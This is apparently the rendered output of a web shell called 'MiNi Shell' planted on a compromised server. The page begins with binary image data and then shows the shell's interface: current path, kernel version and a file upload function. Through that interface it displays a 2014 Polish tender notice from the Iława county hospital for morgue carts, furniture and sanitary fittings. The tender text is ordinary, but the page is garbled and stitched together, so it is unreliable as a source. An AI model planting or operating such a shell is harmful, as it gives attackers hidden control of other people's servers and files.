JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140225/65834-N-2014.html

<p class="kh_header"><b>Iława: Dostawa sprzętu medycznego i wyposażenia z podziałem na 2 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 11/2014)</b><br>
<b>Numer ogłoszenia: 65834 - 2014; data zamieszczenia: 25.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu medycznego i wyposażenia z podziałem na 2 zadania dla Powiatowego Szpitala im. Władysława Biegańskiego w Iławie (nr sprawy 11/2014).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Dostawa sprzętu medycznego 
Zadanie nr 2 Dostawa wyposażenia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.94.00.00-5, 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy 2. Wypełniony formularz specyfikacji przedmiotowej (formularz cenowy) 3.Zaakceptowany projekt umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.1. zmiana dotyczy nieistotnych postanowień zawartej umowy,
1.2.  podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
1.3.w wyniku istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
1.4.zmiana dotyczy obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia 
- w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
1.5.dotyczy zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, 
w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian. W przypadku zmiany podatku VAT cena brutto pozostaje bez zmian zmianie ulega cena netto.
1.6.konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć 
w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
2.	Wprowadzenie zmian określonych w ust. 1 wymaga uzasadnienia konieczności zmiany
 i porozumienia stron oraz sporządzenia aneksu do umowy.
Wszelkie zmiany do umowy wymagają zgody Zamawiającego oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 9...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2014 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Dofinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Warmia i Mazury na lata 2007-2013.
Tytuł projektu Rozbudowa i modernizacja obiektu Powiatowego Szpitala w Iławie- pomieszczenia bryły A wraz z zagospodarowaniem przyległego terenu - etap I.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stół do mycia i ubierania zwłok		Wykonany ze stali nierdzewnej kwasoodpornej, zgodnej z normą EN 10088 1.4031
Wyposażony w: przyłącza wodno-kanalizacyjne, blat roboczy oraz baterię prysznicową z wylewką i odpływem wody z blatu wyposażony w syfon z elastycznym przyłączem do kanalizacji, umożliwiającym łatwy demontaż
	Przejezdy, wyposażony w 4 skrętne koła z hamulcami
	Wysokość stołu: 800 mm (+/- 50 mm)
Długość: 2200 mm (+/- 50 mm)
Szerokość: 750 mm (+/- 50 mm)
Gwarancja 24 miesiące
2.	Wózek do wkładania zwłok do chłodni		Hydrauliczny wózek podnośnikowy w całości wykonany z materiałów nierdzewnych  kwasoodpornych, zgodnych z normą EN 10088 1.4031
	Wyposażony w system prowadnic kompatybilnych z regałami w komorze chłodniczej firmy REZON umożliwiający włożenie ciał na 2 wysokości
	Przeznaczony do bocznego załadunku i wyładunku ciał z komory
	Układ hydrauliczny napędzany pompą ręczną lub nożną
	Wyposażony w cztery obrotowe kółka jezdne z hamulcami
	Długość: 2000 mm (+/- 50 mm)
	Szerokość: 750 mm (+/- 50 mm)
	Gwarancja 24 miesiące
3.	Wózek na zwłoki do pomieszczenia pro morte		Wózek z kapsułą w całości wykonany z materiałów nierdzewnych kwasoodpornych zgodnych z normą EN 10088 1.4031
	4 rączki, po 2 z każdej strony do prowadzenia wózka
	2 rączki - uchwyty do podnoszenia wieka kapsuły
	Wysokość stołu: 750 mm (+/- 50 mm)
	Długość: 2000 mm (+/- 50 mm)
	Wysokość wieka: 350 mm (+/- 50 mm)
	Szerokość: 750 mm (+/- 50 mm)
	Wózek o stałej wysokości dostosowanej do komór chłodniczych firmy REZON, do załadunku bocznego
	4 skrętne koła z hamulcami, niebrudzące posadzki
	Wózek do do transportu wewnętrznego
	Gwarancja 24 miesiące
4.	Wózek zamykany		Wykonany ze stali nierdzewnej kwasoodpornej, zgodnej z normą EN 10088 1.4031
	Wyposażony w zdejmowane leże służące jako nosze
	Pokrywa wykonana ze stali nierdzewnej kwasoodpornej, zgodnej z normą EN 10088 1.4031
	Wysokość leża od podłogi regulowana za pomocą przekładni śrubowej 600 mm(+/- 50 mm) do 850 mm (+/- 50 mm)
	Długość całkowita: 2000 mm(+/- 50 mm)
	Szerokość całkowita 750 mm (+/- 50 mm)
	Cztery pompowane koła jezdne z hamulcami
	Wózek do do transportu wewnętrzno-zewnętrznego
	Gwarancja 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.94.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa wyposażenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Biurko z szufladami i szufladą na klawiaturę	Z lewej strony szafka z szufladą zamykana na klucz lub 4 szuflady zamykane na klucz
W blacie biurka otwór na przewody do komputera
Półka pod klawiaturę
Wymiary: 60x120x75 cm (+/- 50 mm)  
Powierzchnia zmywalna
Konstrukcja - płyta wiórowa o grubości minimum 18mm (dołączyć atest higieniczny) - obustronnie laminowana.
Wszystkie krawędzie płyty nie osłonięte przez konstrukcję (np. czoła szuflady, drzwi, półki) oklejone PCV o grubości min. 2 mm
Zawiasy oraz prowadnice szuflad zabezpieczone antykorozyjnie, z funkcją samo domykania.
Prowadnice szuflad metalowe typu METABOX (lub podobne) lub w przypadku głębokich szuflad łożyskowe o pełnym wysuwie.
Kolorystyka płyty meblowej do wyboru (min. odcienie pomarańczowego, klon, siwy i wanilia)
Biurko musi posiadać atest higieniczny (wystawiony przez uprawnioną jednostkę) dopuszczający ich stosowanie  w placówkach służby zdrowia
Gwarancja 24 miesiące
2.	Krzesło obrotowe tapicerowane	Z regulacją siedziska i oparcia
Płyta siedziska w zakresie przynajmniej 40-55cm od podłogi
Oparcie o wysokości ok 50 - 60 cm
Szerokość siedziska: 450 mm (+/- 50 mm)  
Głębokość siedziska: 450 mm (+/- 50 mm)  
Płynna regulowana wysokość oparcia
Możliwość odchylenia oparcia i blokady w wybranej pozycji
Regulacja głębokości siedziska i oparcia
Pokryte materiałem zmywalnym
Podłokietniki z tworzywa sztucznego
Wyposażone w 5 - cio podporową podstawę
Kółka jezdne
Gwarancja 24 miesiące
3.	Krzesło tapicerowane	Krzesło z oparciem bez regulacji oparcia i siedziska
Pokryte materiałem zmywalnym
Szerokość siedziska: 450 mm (+/- 50 mm)  
Głębokość siedziska: 450 mm (+/- 50 mm)  
Wys. krzesła 800 mm (+/- 50 mm)  
Stelaż wykonany z profili stalowych pokryty farbą proszkową w kolorze czarnym lub chromowany
Gwarancja 24 miesiące
4.	Dozownik na mydło i środek dezynfekcyjny	Wykonany z wysokiej jakości tworzywa sztucznego ABS
Pojemność 0.5 litra
Kolor obudowy: biały
Regulacja dozy: trzy zakresy 0.5 ml, 1.0 ml, 1.5 ml
Wymiary szer. 10 x głęb. 12 x wys. 25 cm (+/- 10 %)
Sposób dozowania: łokciowy
Łatwy w utrzymani w czystości
Gwarancja: 12 miesięcy
Zestaw wkrętów do montażu
5.	Uchwyt na papier toaletowy	Uchwyt do montażu natynkowego
Wykonany ze stali szlachetnej,
Grubość materiału 0,8 mm (+/- 2 mm)
Odchylana pokrywa
Mieści 1 rolkę o maks. O 130 mm
Zestaw mocujący
6.	Szczotka WC	Wolnostojąca szczotka WC wykonana ze stali nierdzewnej
Szerokość: 100 mm (+/- 5 %)
Głębokość: 100 mm (+/- 5 %)
Wysokość: 350 mm (+/- 5 %)
7.	Dozownik na ręczniki papierowe	Przeznaczenie: ręczniki papierowe ZZ
Wielkość listka: ok.250 x 230 mm
Pojemność: ok.500 sztuk
Materiał obudowy: tworzywo ABS
Kolor obudowy: biały
Szerokość: 290 mm (+/- 5 %)
Głębokość: 145 mm (+/- 5 %)
Wysokość: 260 mm (+/- 5 %)
Sposób dozowania: wyciągnięcie jednej sztuki papieru powoduje wysunięcie się kolejnej
Sposób zamknięcia: zamek z kluczem
Okienko kontrolne informujące o ilości ręczników
Rodzaj montażu: naścienny, przykręcany
Waga netto: ok.1,00 kg
Zestaw wkrętów do montażu
Gwarancja: 12 miesięcy
8.	Lustro	Lustro łazienkowe kryształowe, fazowane
Wodoodporne
Grubość materiału ok.5 mm
Wymiary: 400 x 300 mm (+/- 50 mm)
Gwarancja: 24 miesiące
9.	Kosz	Otwierany przyciskiem pedałowym z wewnętrznym wyjmowanym wiaderkiem
Wykonany z tworzywa sztucznego
Kolor: biały lub beżowy
Odporny na pękanie
Powierzchnia gładka łatwa do utrzymania czystości
Pojemność 15  - 20 l
10.	Szafa lekarska 1- drzwiowa przeszklone drzwi	Szerokość 600 mm (+/- 50 mm)
Głębokość 400 mm (+/- 50 mm)
Wysokość 1800 mm (+/- 50 mm)
Szafa posiada jedno, uchylne skrzydło drzwi, zawieszone na zawiasach kołkowych
Wykonana jest z blachy o grubości 0,8-1 mm
Drzwi szafy posiadają przeszklenie wykonane z szyby hartowanej,
Zamykana zamkiem baskwilowym, ryglującym w trzech punktach
Uchwyt klamkowy
Wyposażona jest w 4 półki wykonane ze szkła hartowanego o maksymalnym udźwigu 25 kg.
Malowana jest farbami proszkowymi
Gwarancja 24 miesiące
11.	Zasłony prysznicowe	Wykonane z materiału PCV - wodoszczelne
Wyposażone w zabezpieczające oczka umożliwiające umocowanie na drążku
Wymiary 180 x 200 cm (+/- 5%)
12.	Rurki do zasłon prysznicowych	Drążek prosty, rozporowy
W kolorze białym lub chromowanym
7 szt. o długości maksymalnej 1,2 m
2 szt. o długości maksymalnej 2,2 m
Średnica 20 mm
13.	Łączniki do rurek prysznicowych	Łącznik - uchwyt podwieszany do rurek prysznicowych
W kolorze białym lub chromowanym
Długość: 50 cm (+/- 10%)
Montowany do sufitu
14.	Pokrowiec na rzeczy chorych	Zapinany na zamek lub troki
2 kieszenie o długości 40 cm (+/- 5 cm)
Kolor: biały lub kremowy
Materiał  nadający się do prania w temp. 90
Długość:120 cm (+/-10cm)
Szerokość: 65 cm (+/-5 cm)
15.	Wieszak na rzeczy chorych	Wykonany z drewna
Wyżłobienia do wieszania spódnic
pozioma poprzeczka do zawieszania spodni
Uchwyt metalowy
16.	Rurki chromowane	Chromowane
Średnica 25 mm
17.	Łączniki do rurek	Chromowane
Średnica 25 mm
3- ramienne - 10 szt.
2 - ramienne -  10 szt.
18.	Szafa biurowa stojąca  podzielona na trzy części, dolna część drzwi pełne, środkowa odkryta, górna część drzwi pełne	Wymiary:40x60x180 cm (+/- 5 cm)
Zamki
Powierzchnia zmywalna
Na nóżkach
Konstrukcja - płyta wiórowa o grubości minimum 18mm (dołączyć atest higieniczny) - obustronnie laminowana.
Wszystkie krawędzie płyty nie osłonięte przez konstrukcję (np. drzwi, półki) oklejone PCV o grubości min. 2 mm
Zawiasy zabezpieczone antykorozyjnie, z funkcją samo domykania.
Kolorystyka płyty meblowej do wyboru (min. odcienie pomarańczowego, klon, siwy i wanilia)
Szafa musi posiadać atest higieniczny (wystawiony przez uprawnioną jednostkę) dopuszczający ich stosowanie  placówkach służby zdrowia
Gwarancja 24 miesiące
19.	Regał ze stali nierdzewnej 4 - półkowy	Przeznaczony do składowania i magazynowania
Wykonany ze stali nierdzewnej
4 półki, pełne
Wymiary: dł. 1000 szer.500. Wys.1800 mm (+/- 5%)
Nośność półki 70-100 kg
Gwarancja 24 miesiące
20.	Szafka ubraniowa BHP dwudrzwiowa	Wykonana z blachy malowanej proszkowo, kolor: srebrny metalik
Stabilna spawana konstrukcja, na cokole
Wymiary(wysokość x szerokość x głębokość) 180 x 60x50 cm (+/- 5%)
Dwuprzedziałowa ze ścianką działową, każdy przedział wyposażony w półkę oraz drążek na wieszaki
Drzwi oddzielne dla każdego przedziału z otworami wentylacyjnymi w dolej i górnej części drzwi oraz ramką na tabliczkę informacyjną, zamykane na zamek z ryglem obrotowym, w zestawie 2 klucze do każdego z zamków
Gwarancja 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com